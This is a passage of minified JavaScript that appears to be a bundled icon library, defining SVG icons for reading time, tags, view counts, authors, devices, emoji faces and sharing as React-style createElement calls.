14.5V8.4c0-.7-.6-1.2-1.2-1.2s-1.2.6-1.2 1.2v7.1l4.9 4.9c.2.2.6.4.9.4s.6-.1.9-.4c.5-.5.5-1.3 0-1.8l-4.3-4.1z"})),readingTime5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 18.1 30"},(0,o.createElement)("path",{d:"M12.1 15.9c-.3-.6-.3-1.3 0-1.8l5.6-9.7c.5-.9.5-2 0-2.9-.5-1-1.5-1.5-2.5-1.5H2.9C1.8 0 .9.5.4 1.5c-.5.9-.5 2 0 2.9L6 14.1c.3.6.3 1.3 0 1.8L.4 25.6c-.5.9-.5 2 0 2.9.5.9 1.5 1.5 2.5 1.5h12.2c1.1 0 2-.5 2.5-1.5.5-.9.5-2 0-2.9l-5.5-9.7zM16.7 28c-.3.6-.9.9-1.6.9H2.9c-.7 0-1.3-.3-1.6-.9-.3-.6-.3-1.3 0-1.8l5.6-9.7c.5-.9.5-2 0-2.9L1.4 3.9C1 3.3 1 2.6 1.4 2c.3-.6.9-.9 1.6-.9h12.2c.7 0 1.3.3 1.6.9s.3 1.3 0 1.8l-5.6 9.7c-.5.9-.5 2 0 2.9l5.6 9.7c.3.6.3 1.3-.1 1.9z"}),(0,o.createElement)("path",{d:"M15 25.2c-.3-.5-.8-.8-1.4-.8h-3.1c-.4 0-.8-.3-.8-.8V15c0-.7.2-1.4.5-2l2.5-4.4c.3-.5-.1-1.1-.7-1.1H6c-.6 0-.9.6-.7 1.1L7.9 13c.4.6.5 1.3.5 2v8.7c0 .4-.3.8-.8.8h-3c-.6 0-1.1.3-1.4.8l-.8 1.5c-.2.3-.1.6 0 .7.1.1.3.4.6.4h12.2c.4 0 .6-.2.6-.4.1-.1.2-.4 0-.7l-.8-1.6z"})),tag1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36.053 50"},(0,o.createElement)("path",{d:"M394.89,173.425H365.409a3.29,3.29,0,0,0-3.286,3.286v44.321a2.4,2.4,0,0,0,2.4,2.393,2.358,2.358,0,0,0,1.46-.508l13.46-10.5a1.172,1.172,0,0,1,1.417,0l13.462,10.5a2.358,2.358,0,0,0,1.46.508,2.4,2.4,0,0,0,2.4-2.393V176.711A3.29,3.29,0,0,0,394.89,173.425Zm-.5,3.783v40.968l-11.208-8.739a4.937,4.937,0,0,0-6.07,0l-11.207,8.739V177.208Z",transform:"translate(-362.123 -173.425)"})),tag2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("g",{transform:"translate(-415.893 -173.425)"},(0,o.createElement)("path",{d:"M465.893,195.139l-.055-17.262a4.407,4.407,0,0,0-4.4-4.4l-17.262-.054a4.4,4.4,0,0,0-3.135,1.29l-23.858,23.858a4.411,4.411,0,0,0,0,6.239l17.32,17.32a4.413,4.413,0,0,0,6.24,0L464.6,198.275A4.406,4.406,0,0,0,465.893,195.139Zm-13.915-7.8a4.908,4.908,0,1,1,6.945,0A4.908,4.908,0,0,1,451.978,187.336Z"}))),tag3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.996 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M21.897 50a5.435 5.435 0 0 1-3.87-1.6L1.6 31.976a5.48 5.48 0 0 1 0-7.741L24.227 1.607a5.5 5.5 0 0 1 3.864-1.6h.029l16.369.052a5.483 5.483 0 0 1 5.456 5.457l.051 16.368a5.5 5.5 0 0 1-1.6 3.893L25.768 48.404A5.435 5.435 0 0 1 21.897 50Zm6.2-47.422a2.906 2.906 0 0 0-2.043.847L3.42 26.052a2.895 2.895 0 0 0 0 4.1l16.429 16.424a2.9 2.9 0 0 0 4.1 0l22.627-22.627a2.9 2.9 0 0 0 .847-2.055l-.052-16.372a2.9 2.9 0 0 0-2.885-2.886l-16.377-.06Zm10.711 14.559a5.911 5.911 0 0 1-4.205-1.742 5.945 5.945 0 1 1 4.205 1.742Zm0-9.31a3.366 3.366 0 0 0-2.388 5.749 3.366 3.366 0 1 0 2.382-5.745Z"}))),tag4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.945 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m41.499 29.13 3.459-12.847a4.647 4.647 0 0 0-1.2-4.48l-.695-.694-3.78 3.78a4.693 4.693 0 1 1-4.167-4.168l3.78-3.779-.691-.692a4.633 4.633 0 0 0-4.48-1.2L20.869 8.501a4.73 4.73 0 0 0-2.075 1.2L1.353 27.146a4.629 4.629 0 0 0 .008 6.547l14.955 14.955a4.629 4.629 0 0 0 6.539 0l17.441-17.439a4.6 4.6 0 0 0 1.203-2.079ZM22.064 40.809 9.192 27.937l1.647-1.647 12.872 12.872Zm5.2-5.2L14.392 22.738l1.647-1.647 12.872 12.871Z"}),(0,o.createElement)("path",{d:"M38.587 3.298a1.01 1.01 0 0 0 1.429 0l.734-.734a1.86 1.86 0 0 1 2.631 2.631l-9.486 9.486a1.01 1.01 0 0 0 1.429 1.428l9.486-9.486a3.881 3.881 0 0 0-5.489-5.489l-.734.734a1.012 1.012 0 0 0 0 1.43Z"}))),tag5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50.003 50"},(0,o.createElement)("g",null,(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m46.162 27.099 3.633-13.513a6.171 6.171 0 0 0-1.591-5.943l-.775-.776-1.8 1.8.776.776a3.612 3.612 0 0 1 .929 3.478l-3.631 13.51a3.631 3.631 0 0 1-.933 1.614L24.42 46.394a3.6 3.6 0 0 1-5.087 0L3.606 30.666a3.6 3.6 0 0 1 0-5.087L21.951 7.238a3.617 3.617 0 0 1 1.612-.933l13.513-3.628a3.61 3.61 0 0 1 3.48.929l.772.773 1.8-1.8-.772-.773a6.172 6.172 0 0 0-5.944-1.59l-13.517 3.63a6.179 6.179 0 0 0-2.752 1.592L1.798 23.779a6.156 6.156 0 0 0 0 8.7l15.73 15.723a6.156 6.156 0 0 0 8.7 0l18.35-18.349a6.183 6.183 0 0 0 1.584-2.754Z"}),(0,o.createElement)("path",{d:"M31.065 10.164a6.2 6.2 0 1 0 9.578 1l8.52-8.52-1.8-1.8-8.52 8.519a6.211 6.211 0 0 0-7.778.801Zm6.967 6.967a3.651 3.651 0 1 1 0-5.163 3.656 3.656 0 0 1-.004 5.163Z"})),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m17.406 21.542 1.414-1.414 11.052 11.051-1.415 1.414z"})),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m12.949 25.999 1.414-1.414 11.052 11.051L24 37.05z"})))),tag6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 35.699 50"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"m32.767 49.613-13.8-10.761a1.818 1.818 0 0 0-2.233 0l-13.8 10.761a1.815 1.815 0 0 1-2.931-1.431V2.736A2.736 2.736 0 0 1 2.739 0h30.227a2.736 2.736 0 0 1 2.736 2.736v45.446a1.815 1.815 0 0 1-2.935 1.431Z"}))),viewCount1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100.4 63.9"},(0,o.createElement)("path",{d:"M99.7 30.7C90.3 11.8 71.3 0 50.2 0S10.1 11.8.6 30.7L0 31.9l.6 1.3C10 52.1 29 63.9 50.2 63.9s40.1-11.8 49.6-30.7l.6-1.3-.7-1.2zm-43-19.5c5.2 0 9.4 4.2 9.4 9.4S61.9 30 56.7 30s-9.4-4.2-9.4-9.4 4.2-9.4 9.4-9.4zm-6.5 47c-18.5 0-35.1-10-43.8-26.3C12.9 19.7 23.9 11 36.9 7.5c-5 3.9-8.2 10-8.2 16.9 0 11.9 9.6 21.5 21.5 21.5s21.5-9.6 21.5-21.5c0-6.8-3.2-12.9-8.2-16.9 13 3.6 24 12.3 30.5 24.4-8.7 16.3-25.3 26.3-43.8 26.3z"})),viewCount2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 63.7"},(0,o.createElement)("path",{d:"M99.4 30.6C90 11.7 71.1 0 50 0S10 11.7.6 30.6L0 31.8l.6 1.3C10 52 29 63.7 50 63.7S90 52 99.4 33.1l.6-1.3-.6-1.2zM50 58C31.6 58 15 48 6.4 31.8 15 15.7 31.6 5.7 50 5.7s35 10 43.6 26.1C85 48 68.4 58 50 58z"}),(0,o.createElement)("path",{d:"M50 12c-10.9 0-19.8 8.9-19.8 19.8S39.1 51.6 50 51.6s19.8-8.9 19.8-19.8S61 12 50 12zm0 34c-7.8 0-14.2-6.3-14.2-14.2S42.2 17.7 50 17.7 64.2 24 64.2 31.8 57.8 46 50 46z"})),viewCount3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 53.5"},(0,o.createElement)("path",{d:"M98.9 25.1C87.6 9.4 69.4 0 50 0 30.7 0 12.4 9.4 1.2 25.1L0 26.7l1.2 1.6C12.4 44.1 30.7 53.5 50 53.5c19.3 0 37.6-9.4 48.8-25.1l1.2-1.6-1.1-1.7zm-27.8 1.6c0 11.6-9.5 21.1-21.1 21.1-11.6 0-21.1-9.5-21.1-21.1 0-11.6 9.5-21.1 21.1-21.1 11.7.1 21.1 9.5 21.1 21.1zM7 26.7c5.9-7.6 13.7-13.4 22.4-17-3.8 4.6-6.1 10.6-6.1 17 0 6.5 2.3 12.4 6.1 17-8.7-3.5-16.5-9.3-22.4-17zm63.6 17.1c3.8-4.6 6.1-10.6 6.1-17 0-6.5-2.3-12.4-6.1-17 8.7 3.6 16.5 9.4 22.4 17-5.8 7.6-13.6 13.4-22.4 17z"})),viewCount4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 90.5 76.9"},(0,o.createElement)("path",{d:"M60.7 43.2c-6.2 0-11.2-5-11.2-11.2 0-5.4 3.8-9.9 8.9-11-4-2-8.4-3.1-13.1-3.1-16.3 0-29.5 13.2-29.5 29.6C15.8 63.8 29 77 45.3 77s29.6-13.2 29.6-29.5c0-4.7-1.1-9.2-3.1-13.1-1.2 4.9-5.7 8.8-11.1 8.8z"}),(0,o.createElement)("path",{d:"M45.2 0C24.3 0 6.2 13.4 0 33.2L5.9 35C11.2 17.8 27.1 6.2 45.2 6.2c18.2 0 34 11.6 39.3 28.9l5.9-1.8C84.3 13.4 66.1 0 45.2 0z"})),viewCount5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 90.5 56"},(0,o.createElement)("path",{d:"M45.2 0C25.4 0 8.3 11.4 0 28c8.3 16.6 25.4 28 45.2 28 19.8 0 37-11.4 45.3-28C82.2 11.4 65 0 45.2 0zm0 48.7c-11.4 0-20.7-9.3-20.7-20.7 0-11.5 9.3-20.7 20.7-20.7 11.5 0 20.7 9.3 20.7 20.7 0 11.4-9.2 20.7-20.7 20.7z"}),(0,o.createElement)("path",{d:"M45.2 15.2c-7.1 0-12.8 5.7-12.8 12.8 0 7 5.7 12.8 12.8 12.8 7 0 12.8-5.7 12.8-12.8H45.2V15.2z"})),viewCount6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42.5 37.4"},(0,o.createElement)("path",{d:"M40.8 1.9C40.6.5 39.2-.4 37.9.1L24.9 5c-1.7.6-1.9 3-.4 3.9l5.6 3.4-6 9.9c-.5.9-1.7 1.2-2.6.6l-5.8-3.5c-1.2-.8-2.7-1-4.1-.6-1.4.3-2.6 1.2-3.3 2.5l-8 13.5c-.5.8-.2 1.9.6 2.4.3.2.6.3.9.3.6 0 1.2-.3 1.5-.8L11.4 23c.3-.4.7-.7 1.2-.9.5-.1 1 0 1.4.2l5.8 3.5c2.6 1.5 5.9.7 7.4-1.8l6-9.9 6 3.6c1.6.9 3.5-.3 3.3-2.1L40.8 1.9z"})),author1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.8 37.6"},(0,o.createElement)("path",{d:"M16.4 19.9C7.4 19.9 0 27.3 0 36.3v1.3h32.8v-1.3c0-9-7.3-16.4-16.4-16.4zM2.7 35c.7-7 6.6-12.5 13.8-12.5S29.5 28 30.2 35H2.7zM16.4 17.7c4.9 0 8.9-4 8.9-8.9S21.3 0 16.4 0 7.6 4 7.6 8.9s3.9 8.8 8.8 8.8zm0-15.1c3.5 0 6.3 2.8 6.3 6.3s-2.8 6.3-6.3 6.3-6.3-2.8-6.3-6.3 2.9-6.3 6.3-6.3z"})),author2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.1 36.6"},(0,o.createElement)("path",{d:"M14 16.8c-7.8 0-14 6.3-14 14 0 3.9 7 5.8 14 5.8s14-1.9 14-5.8c.1-7.7-6.2-14-14-14zm0 17.3c-7.5 0-11.6-2.2-11.6-3.3 0-6.4 5.2-11.6 11.6-11.6 6.4 0 11.6 5.2 11.6 11.6 0 1.2-4.1 3.3-11.6 3.3zM9 14.5h2.6c-1.8-1-3.1-3.1-3.1-5.5 0-.5 0-.9.1-1.4.1-.6.5-1.1 1.1-1.4l1.7-1c.6-.3 1.3-.4 1.9-.2l4.9 1.7c.9.3 1.5 1.1 1.5 2V9c0 2.4-1.3 4.5-3.1 5.5h2.5c1.2 0 2.2-1 2.2-2.2v-5c0-4.3-3.8-7.8-8.2-7.2-3.7.4-6.3 3.7-6.3 7.4v4.8c0 1.2 1 2.2 2.2 2.2z"})),author3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 27.8 29.5"},(0,o.createElement)("path",{d:"M27.7 26.7c-1.3-6.5-7-11.3-13.8-11.3S1.3 20.3 0 26.7c-.3 1.4.9 2.8 2.3 2.8h23c1.6 0 2.7-1.3 2.4-2.8z"}),(0,o.createElement)("circle",{cx:"13.9",cy:"6.4",r:"6.4"})),author4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 27.3 27.6"},(0,o.createElement)("path",{d:"M13.6 13.1c3.6 0 6.6-2.9 6.6-6.6 0-3.6-2.9-6.6-6.6-6.6H7.1v6.6c0 3.7 2.9 6.6 6.5 6.6zM9.1 2h4.6c2.5 0 4.6 2 4.6 4.6s-2 4.6-4.6 4.6-4.6-2-4.6-4.6V2zM13.6 14C6.1 14 0 20.1 0 27.6h2C2 21.2 7.2 16 13.6 16c6.4 0 11.6 5.2 11.6 11.6h2c.1-7.5-6-13.6-13.6-13.6z"})),author5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 28.8 26.6"},(0,o.createElement)("path",{d:"M28.8 23.7c-.7-3.5-2.6-6.5-5.3-8.6-1.5-1.2-3.6-1.5-5.5-.8-1.1.4-2.4.6-3.6.6-1.3 0-2.5-.2-3.6-.6-1.9-.6-3.9-.4-5.5.8C2.6 17.2.7 20.2.1 23.7c-.3 1.5.9 2.9 2.4 2.9h23.9c1.5 0 2.7-1.4 2.4-2.9z"}),(0,o.createElement)("circle",{transform:"rotate(-67.5 14.418 6.372)",cx:"14.4",cy:"6.4",r:"6.4"})),user:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 18 20"},(0,o.createElement)("path",{d:"M18,19 C18,19.5522847 17.5522847,20 17,20 C16.4477153,20 16,19.5522847 16,19 L16,17 C16,15.3431458 14.6568542,14 13,14 L5,14 C3.34314575,14 2,15.3431458 2,17 L2,19 C2,19.5522847 1.55228475,20 1,20 C0.44771525,20 0,19.5522847 0,19 L0,17 C0,14.2385763 2.23857625,12 5,12 L13,12 C15.7614237,12 18,14.2385763 18,17 L18,19 Z M9,10 C6.23857625,10 4,7.76142375 4,5 C4,2.23857625 6.23857625,0 9,0 C11.7614237,0 14,2.23857625 14,5 C14,7.76142375 11.7614237,10 9,10 Z M9,8 C10.6568542,8 12,6.65685425 12,5 C12,3.34314575 10.6568542,2 9,2 C7.34314575,2 6,3.34314575 6,5 C6,6.65685425 7.34314575,8 9,8 Z"})),desktop:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20"},(0,o.createElement)("rect",{x:"0",fill:"none",width:"20",height:"20"}),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M3 2h14c.55 0 1 .45 1 1v10c0 .55-.45 1-1 1h-5v2h2c.55 0 1 .45 1 1v1H5v-1c0-.55.45-1 1-1h2v-2H3c-.55 0-1-.45-1-1V3c0-.55.45-1 1-1zm13 9V4H4v7h12zM5 5h9L5 9V5z"}))),laptop:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M20.5 16h-.7V8c0-1.1-.9-2-2-2H6.2c-1.1 0-2 .9-2 2v8h-.7c-.8 0-1.5.7-1.5 1.5h20c0-.8-.7-1.5-1.5-1.5zM5.7 8c0-.3.2-.5.5-.5h11.6c.3 0 .5.2.5.5v7.6H5.7V8z"})),tablet:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20"},(0,o.createElement)("rect",{x:"0",fill:"none",width:"20",height:"20"}),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M4 2h12c.55 0 1 .45 1 1v14c0 .55-.45 1-1 1H4c-.55 0-1-.45-1-1V3c0-.55.45-1 1-1zm11 14V4H5v12h10zM6 5h6l-6 5V5z"}))),mobile:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20"},(0,o.createElement)("rect",{x:"0",fill:"none",width:"20",height:"20"}),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M6 2h8c.55 0 1 .45 1 1v14c0 .55-.45 1-1 1H6c-.55 0-1-.45-1-1V3c0-.55.45-1 1-1zm7 12V4H7v10h6zM8 5h4l-4 5V5z"}))),angry_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.767 19.767 0 0 1 24 4.1M24 0a24 24 0 1 0 16.97 7.03A24.006 24.006 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M31.79 36.919a1.5 1.5 0 0 1-1.28-.717 7.644 7.644 0 0 0-13.02 0 1.5 1.5 0 1 1-2.558-1.566 10.642 10.642 0 0 1 18.136 0 1.5 1.5 0 0 1-1.278 2.283"}),(0,o.createElement)("path",{d:"M19.003 17.219a1.482 1.482 0 0 1-.778-.219l-4.079-2.481a1.5 1.5 0 0 1 1.558-2.563l4.079 2.482a1.5 1.5 0 0 1-.78 2.781"}),(0,o.createElement)("path",{d:"M28.996 17.219a1.5 1.5 0 0 1-.78-2.781l4.079-2.482a1.5 1.5 0 0 1 1.558 2.563L29.774 17a1.482 1.482 0 0 1-.778.219"}),(0,o.createElement)("path",{d:"M35.355 22.728c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52"}),(0,o.createElement)("path",{d:"M19.175 22.728c0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52s3.28 2.01 3.28 4.52"}))),angry_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M40.97 7.03A24 24 0 1 0 48 24a24 24 0 0 0-7.03-16.97m-12.85 5.48.01-.01 4.08-2.46a1.605 1.605 0 0 1 1.21-.21 1.639 1.639 0 0 1 .51 2.99l-4.08 2.49a1.537 1.537 0 0 1-.85.22 1.71 1.71 0 0 1-1.41-.75 1.677 1.677 0 0 1 .53-2.27m7.23 8.99c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52M13.53 10.59a1.617 1.617 0 0 1 1.02-.75 1.537 1.537 0 0 1 1.22.21l4.07 2.45a1.631 1.631 0 0 1-.84 3.03 1.537 1.537 0 0 1-.85-.22l-4.08-2.49a1.625 1.625 0 0 1-.54-2.23m2.36 6.39c1.8 0 3.28 2.01 3.28 4.52 0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52m20.25 20.56-.01.01a1.706 1.706 0 0 1-.83.23 1.633 1.633 0 0 1-1.4-.78 11.636 11.636 0 0 0-19.81 0 1.673 1.673 0 0 1-2.26.55 1.654 1.654 0 0 1-.73-1.04 1.61 1.61 0 0 1 .22-1.21 14.867 14.867 0 0 1 25.36.01 1.626 1.626 0 0 1-.54 2.23"})),confused_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.767 19.767 0 0 1 24 4.1M24 0a24 24 0 1 0 16.97 7.03A24.006 24.006 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M19.633 37.082a1.5 1.5 0 0 1-1.418-1.983 12.827 12.827 0 0 1 6.2-6.838c3.287-1.57 7.2-1.546 11.637.069a1.5 1.5 0 0 1-1.027 2.818c-3.633-1.323-6.756-1.388-9.283-.2a9.923 9.923 0 0 0-4.694 5.125 1.506 1.506 0 0 1-1.418 1.005"}),(0,o.createElement)("path",{d:"M35.355 17.11c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52"}),(0,o.createElement)("path",{d:"M19.175 17.11c0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52s3.28 2.01 3.28 4.52"}))),confused_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M40.97 7.03A24 24 0 1 0 48 24a23.934 23.934 0 0 0-7.03-16.97m-8.85 4.4c1.78 0 3.25 2.01 3.25 4.52 0 2.49-1.44 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52m-16.21 9.05c-1.8 0-3.25-2.04-3.25-4.53 0-2.51 1.45-4.52 3.25-4.52s3.28 2.01 3.28 4.52c0 2.49-1.48 4.53-3.28 4.53m21.17 9.84a1.658 1.658 0 0 1-2.09.98c-3.6-1.32-6.68-1.39-9.17-.22a9.783 9.783 0 0 0-4.62 5.04 1.659 1.659 0 0 1-1.55 1.11 1.3 1.3 0 0 1-.56-.11 1.562 1.562 0 0 1-.9-.78 1.713 1.713 0 0 1-.1-1.26 13.126 13.126 0 0 1 6.29-6.93c3.3-1.59 7.25-1.57 11.73.07a1.564 1.564 0 0 1 .92.83 1.6 1.6 0 0 1 .05 1.27"})),happy_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.766 19.766 0 0 1 24 4.1M24 0a24 24 0 1 0 16.969 7.03A24.006 24.006 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M36.191 26.853a12.192 12.192 0 0 1-24.383 0Z"}),(0,o.createElement)("path",{d:"M35.356 16.741c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52"}),(0,o.createElement)("path",{d:"M19.175 16.741c0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52s3.28 2.01 3.28 4.52"}))),happy_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M40.97 7.03A24 24 0 1 0 48 24a23.934 23.934 0 0 0-7.03-16.97m-8.85 4.4c1.77 0 3.25 2.01 3.25 4.52 0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52m-16.21 0c1.8 0 3.28 2.01 3.28 4.52 0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52m8 27.39a12.16 12.16 0 0 1-12.08-12.08H36.2a12.166 12.166 0 0 1-12.29 12.08"})),smile_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.766 19.766 0 0 1 24 4.1M24 0a24 24 0 1 0 16.97 7.03A24.006 24.006 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M24 37.641a14.635 14.635 0 0 1-12.576-7.034 1.5 1.5 0 1 1 2.558-1.567 11.76 11.76 0 0 0 20.036 0 1.5 1.5 0 1 1 2.558 1.567A14.638 14.638 0 0 1 24 37.641"}),(0,o.createElement)("path",{d:"M35.355 17.962c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52"}),(0,o.createElement)("path",{d:"M19.175 17.962c0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52s3.28 2.01 3.28 4.52"}))),smile_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M40.96 7.03A23.992 23.992 0 1 0 48 24a23.928 23.928 0 0 0-7.04-16.97m-8.859 6.43c1.769 0 3.25 2.01 3.25 4.52 0 2.49-1.451 4.53-3.25 4.53s-3.281-2.04-3.281-4.53c0-2.51 1.481-4.52 3.281-4.52m-16.211 0c1.8 0 3.281 2.01 3.281 4.52 0 2.49-1.481 4.53-3.281 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52m20.791 17.22A14.737 14.737 0 0 1 24 37.78a14.754 14.754 0 0 1-12.69-7.1 1.622 1.622 0 0 1-.19-1.25 1.6 1.6 0 0 1 .731-.99 1.687 1.687 0 0 1 1.26-.18 1.545 1.545 0 0 1 .979.73 11.645 11.645 0 0 0 19.821 0 1.57 1.57 0 0 1 1.01-.75 1.533 1.533 0 0 1 1.229.21 1.553 1.553 0 0 1 .72.97 1.641 1.641 0 0 1-.189 1.26"})),share_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.04 47.56"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M12.959 43.4a8.527 8.527 0 0 1-8.527-14.745 21.412 21.412 0 0 1-.071-1.763 20.16 20.16 0 0 1 11.64-18.264 8.527 8.527 0 0 1 17.035-.01 20.194 20.194 0 0 1 11.638 18.274c0 .6-.024 1.189-.071 1.761A8.528 8.528 0 0 1 36.078 43.4a20.121 20.121 0 0 1-23.119 0Zm11.564-.447a15.859 15.859 0 0 0 8.388-2.373 8.53 8.53 0 0 1 7.088-13.28q.285 0 .571.019.005-.211.005-.425a16.1 16.1 0 0 0-8.4-14.116 8.53 8.53 0 0 1-15.318.007 16.062 16.062 0 0 0-8.4 14.109q0 .213.005.425.287-.019.573-.019a8.53 8.53 0 0 1 7.087 13.286 15.885 15.885 0 0 0 8.401 2.371Zm11.634-9.339a4.432 4.432 0 0 0 1.62 6.048 4.374 4.374 0 0 0 2.206.595 4.447 4.447 0 0 0 3.842-2.217 4.428 4.428 0 0 0-3.826-6.64 4.448 4.448 0 0 0-3.842 2.214Zm-29.325-1.62a4.421 4.421 0 1 0 2.207-.6 4.358 4.358 0 0 0-2.207.6Zm17.685-18.538a4.428 4.428 0 1 0-4.427-4.428 4.433 4.433 0 0 0 4.427 4.428Z"})),share:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36 42.16"},(0,o.createElement)("path",{d:"M30.478 30.796a5.339 5.339 0 0 0-2.867.85l-12.319-8.39a7.556 7.556 0 0 0 .319-2.23 7.133 7.133 0 0 0-.637-2.973l11.787-8.071a5.362 5.362 0 0 0 3.611 1.274A5.665 5.665 0 0 0 36 5.628 5.574 5.574 0 0 0 30.478 0a5.665 5.665 0 0 0-5.628 5.628 4.409 4.409 0 0 0 .318 1.7l-11.894 8.071a7.619 7.619 0 0 0-5.416-2.23 7.859 7.859 0 0 0 0 15.717 7.571 7.571 0 0 0 5.947-2.762l11.576 7.859a5.042 5.042 0 0 0-.638 2.549 5.629 5.629 0 1 0 5.735-5.735"})),apple_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 39.1 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M37.851 16.352a10.875 10.875 0 0 0-5.2 9.149 10.585 10.585 0 0 0 6.445 9.71 25.175 25.175 0 0 1-3.3 6.815c-2.055 2.958-4.2 5.912-7.467 5.912s-4.107-1.9-7.876-1.9c-3.674 0-4.981 1.959-7.968 1.959s-5.071-2.737-7.468-6.1A29.422 29.422 0 0 1 0 25.997C0 16.661 6.07 11.71 12.044 11.71c3.175 0 5.821 2.084 7.814 2.084 1.9 0 4.855-2.209 8.467-2.209a11.323 11.323 0 0 1 9.523 